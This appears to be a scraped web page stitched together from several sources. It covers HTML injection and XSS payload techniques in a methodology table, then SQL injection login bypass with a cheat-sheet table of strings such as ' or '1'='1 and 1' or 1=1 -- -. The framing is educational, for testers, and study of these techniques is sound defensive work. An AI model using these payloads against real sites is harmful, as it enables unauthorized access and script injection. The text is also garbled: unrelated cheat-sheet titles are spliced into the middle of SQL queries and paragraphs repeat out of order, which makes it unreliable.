HTML Injection also termed as “virtual defacements” is one of the most simple and the most common vulnerability that arises when the web-page fails to sanitize the user-supplied input or validates the output, which thus allows the attacker to craft his payloads and injects the malicious HTML codes into the application through the vulnerable.
HTML Cheat Sheet PDF. Save the.pdf version of this interactive page to keep it on your desktop or print it and hang it on the wall and always sneak a peek while coding, composing an article or designing a website. A PDF file is available for every cheat sheet on this website: CSS, JavaScript and others. Interactive cross-site scripting (XSS) cheat sheet for 2021, brought to you by PortSwigger. Actively maintained, and regularly updated with new vectors.
Ending HTML comments with a backtick character#133 test. On older versions of the Internet Explorer, a backtick charcater can be utilized to end a HTML comment and inject otherwise commented markup. A HTML filter allowing comments can be bypassed with this trick and allow an attacker to inject arbitrary HTML.
SQL injection
When a user enters a user name and password, a SQL query is created and executed to search on the database to verify them. The above query searches in the users table where name is tom and password is tom. If matching entries are found, the user is authenticated.
The above query is not going yield any results as it is not a valid query. If the web page is not filtering out the error messages, you will be able to see an error message on the page. The trick is not make the query valid by putting proper SQL commands on place.
If the username is already known, the only thing to be bypassed is the password verification. So, the SQL commands should be fashioned in the similar way.
The password='or1='1' condition is also always true just like in the first case and thus bypasses the security.
The SQL query is crafted in such a way that both username and password verifications are bypassed. The above statement actually queries for all the users in the database and thus bypasses the security.
The above query is also more or less similar to the previously executed query and is a possible way to get authenticated.
The Book takes care to explain the elevation of Cross-Site Scripting (XSS) to the title of HTML Injection. This quick reference describes some of the common techniques used to inject a payload into a web application.
In the examples below the biohazard symbol (U+2623), ☣, represents an executable JavaScript payload. It could be anything from a while loop to lock the browser, e.g.
while(1){a=1;}
, or something more useful that a creative attacker comes up with. You can quite easily find “XSS Cheat Sheets” elsewhere. The intent of this reference is to instill a sense of methodology into finding HTML injection vulnerabilities. Good exploits take advantage of HTML syntax and browser quirks in creative ways. Take the time to experiment with simple payloads and observe how (and where) the web application reflects them. Then turn towards the list of complex attacks on a cheat sheet.Also notice how the syntax of elements and JavaScript have been preserved in cases where single- or double-quotes are used to prefix a payload. The injected quote prematurely ends a quoted string, which means there will be a dangling quote at the end. Whether the reflection point is in an intrinsic event or a JavaScript block, the dangling quote is trivially consumed by throwing an extra variable definition with an open quote:
;a='
The dangling quote will close the delimiter and, in most cases, the syntax will be preserved. This type of closure isn’t really necessary for an exploit to work, but it’s a sign craftier exploits.
The table’s layout is a bit constrained by the format of this post. Keep an eye on it for updates to content as well as presentation.
table { border-collapse: collapse; border: solid }thead { border: solid medium; text-align: center; }td { border: solid thin; text-align: center; padding: 2px; }.leftText { text-align: left }
Technique | Characters | Payload Example | Injection Example |
---|---|---|---|
Close a start tag in order to insert a new element (This usually happens within an element attribute, but keep in mind HTML comments and XML CDATA.) | > /> –> ]]> | ><script>☣<script> | <input type=text name=id value= ><script>☣<script> > |
Insert an end tag in order to insert a new element (Also useful where XML appears, such as RSS feeds.) | </element> ]]> | ]]><script>☣<script> | <INFO><![CDATA[ ]]><script>☣</script> |
Close a quoted attribute in order to insert an intrinsic event | ” (ASCII 0x22) ‘ (ASCII 0x27) | “onEvent=☣;a=” | <a href=”/redir?url=http://” onClick=☣;a=”“> |
Break out of a JavaScript variable | ” (ASCII 0x22) ‘ (ASCII 0x27) | “;{☣}var foo=” | <script> var host = window.location; var lastLink = “http://web.site/index?refurl=“;{☣}var foo=”“; … <script> |
Split payload across multiple reflection points (Also a good way to bypass filters. Use HTML comment delimiters to elide content between the two payloads. In some cases you might be able to use quoted strings to elide content.) | (as above) | 1: “<script<!– 2: –>>☣</script> | <input value=”“<script<!– “>other content <input value=” –>>☣</script>“ |
Alter MIME interpretation of uploaded file (Usually when content is expected to be served as text/plain, binary, or other non-HTML type) | Must be able to influence Content-Type header or browser’s MIME sniffing algorithm | text/html application/x-javascript | Uploaded file contains JavaScript. Image EXIF data contains HTML & JavaScript. |
Bypass a filter using browser quirk | Alternate whitespace character Non-standard element or attribute | – | See http://x86.cx/html5/ for an example of a complex src attribute for an img element. |
Bypass a filter using alternate or invalid character encoding (The goal is to find a sequence that disrupts or confuses a parser enough that a character such as ASCII 0x22 is considered part of a multibyte sequence, but is served to the browser as a single-byte character. This would either occur because a server-side filter incorrectly stripped or rewrote the invalid sequence or the browser’s character parser misinterpreted the sequence.) | UTF-7 UTF-8 Unicode | – | %fe%22 %fd%22 %cd%22 %c1%22 %c0%a2 %80%22 %22 |
JavaScript execution in CSS and style definitions [Obsolete for modern browsers due to security concerns] | – | – | IE Expressions Mozilla -moz-binding |
Login page #1
- Login page with user name and password verification
- Both user name and password field are prone to code injection.
Credentials for logging in normally
User name | Password |
---|---|
admin | admin |
tom | tom |
ron | ron |
SQL injection
Executed SQL query when username is tom and password is tom:
SELECT * FROM users WHERE name='tom'andHtml Injection Cheat Sheet Template
password='tom'When a user enters a user name and password, a SQL query is created and executed to search on the database to verify them. The above query searches in the users table where name is tom and password is tom. If matching entries are found, the user is authenticated.
In order to bypass this security mechanism, SQL code has to be injected on to the input fields. The code has to be injected in such a way that the SQL statement should generate a valid result upon execution. If the executed SQL query has errors in the syntax, it won't featch a valid result. So filling in random SQL commands and submitting the form will not always result in succesfull authentication.
Executed SQL query when username is tom and password is a single quote:
SELECT * FROM users WHERE name='tom'and password=''The above query is not going yield any results as it is not a valid query. If the web page is not filtering out the error messages, you will be able to see an error message on the page. The trick is not make the query valid by putting proper SQL commands on place.
Executed SQL query when username is tom and password is ' or '1'='1:
SELECT * FROMOracle Sql Injection Cheat Sheet
users WHERE name='tom'and password='or'1'='1'If the username is already known, the only thing to be bypassed is the password verification. So, the SQL commands should be fashioned in the similar way.
The password='or'1'='1' condition is always true, so the password verification never happens. It can also be said that the above statement is more or less equal to
SELECT * FROM users WHERE name='tom'
SELECT * FROM users WHERE name='tom'
That is just one of the possibility. The actual exploit is limited only by the imagination of the tester. Let's see another possibility.
Executed SQL query when username is tom and password is ' or 1='1:
SELECT * FROM users WHERE name='tom'and password='or1='1'The password='or1='1' condition is also always true just like in the first case and thus bypasses the security.
The above two cases needed a valid username to be supplied. But that is not necesserily required since the username field is also vulnerable to SQL injection attacks.
Executed SQL query when username is ' or '1'='1 and password is ' or '1'='1:
SELECT * FROM users WHERE name='or'1'='1'and password='or'1'='1'The SQL query is crafted in such a way that both username and password verifications are bypassed. The above statement actually queries for all the users in the database and thus bypasses the security.
Executed SQL query when username is ' or ' 1=1 and password is ' or ' 1=1:
SELECT * FROM users WHERE name='or' 1=1'and password='or' 1=1'The above query is also more or less similar to the previously executed query and is a possible way to get authenticated.
Sql Injection Cheat Sheet Owasp
Cheat sheet
User name | Password | SQL Query |
---|---|---|
tom | tom | SELECT * FROM users WHERE name='tom' and password='tom' |
tom | ' or '1'='1 | SELECT * FROM users WHERE name='tom' and password='or'1'='1' |
tom | ' or 1='1 | SELECT * FROM users WHERE name='tom' and password='or1='1' |
tom | 1' or 1=1 -- - | SELECT * FROM users WHERE name='tom' and password='or1=1-- -' |
' or '1'='1 | ' or '1'='1 | SELECT * FROM users WHERE name='or'1'='1' and password='or'1'='1' |
' or ' 1=1 | ' or ' 1=1 | SELECT * FROM users WHERE name='or' 1=1' and password='or' 1=1' |
1' or 1=1 -- - | blah | SELECT * FROM users WHERE name='1'or1=1-- -' and password='blah' |